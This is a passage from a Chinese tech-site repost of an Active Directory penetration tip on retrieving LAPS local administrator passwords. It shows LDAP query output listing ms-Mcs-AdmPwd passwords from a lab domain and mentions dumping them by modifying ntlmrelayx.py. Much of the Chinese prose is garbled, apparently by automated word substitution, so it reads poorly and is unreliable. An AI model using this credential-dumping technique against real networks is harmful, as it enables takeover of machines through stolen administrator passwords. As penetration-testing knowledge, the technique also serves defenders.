作家
登录

域渗透TIPS:获取LAPS管理员密码

作者: 来源: 2017-08-08 17:34:27 阅读 我要评论

LabComputers,OU=Lab,DC=sittingduck,DC=info 
  • ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR 
  •  
  • # SD_WSUS_2012, LabComputers, Lab, sittingduck.info 
  • dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info 
  • ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T 
  •  
  • # WIN-PM0ID6F0AHN, LabComputers, Lab, sittingduck.info 
  • dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info 
  • ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#( 
  •  
  • # search reference 
  • ref: ldap://research.sittingduck.info/DC=research,DC=sittingduck,DC=info 
  •  
  • # search reference 
  • ref: ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,D 
  •  C=info 
  •  
  • # search reference 
  • ref: ldap://DomainDnsZones.sittingduck.info/DC=DomainDnsZones,DC=sittingduck,D 
  •  C=info 
  •  
  • # search reference 
  • ref: ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info 
  •  
  • # search result 
  • search: 2 
  • result: 0 Success 
  • 至大年夜获得本地治理员暗码,但还没有肯定该帐号是否启用,你可以应用Kerberos进行身份验证。因为Windows中域控制器对LDAP连接不会请求证书验证(据我所知),你只需在ntlmrelayx.py进行一些小修改就能转储LAPS暗码了。

    【编辑推荐】

    1. Faraday:协同渗入渗出测嗜吒巢然马脚治理平台
    2. 多重转发渗入渗出隐蔽内网
    3. 12款白帽子用于黑客渗入渗出测试的操作体系
    4. Kali Linux中优良Wifi渗入渗出对象TOP 10
    5. 2017年最佳iPhone渗入渗出APP及对象
    【义务编辑:IT疯 TEL:(010)68476606】

      推荐阅读

      那些有趣/用的Python库

    图片处理pip install httpstat httpstat httpbin.org/get pip install pillow from PIL import Image import numpy as np a = np.array(Image.open('test.jpg')) b = [255,255,255] >>>详细阅读


    本文标题:域渗透TIPS:获取LAPS管理员密码

    地址:http://www.17bianji.com/lsqh/36610.html

    关键词: 探索发现

    乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

    网友点评
    自媒体专栏

    评论

    热度

    精彩导读
    栏目ID=71的表不存在(操作类型=0)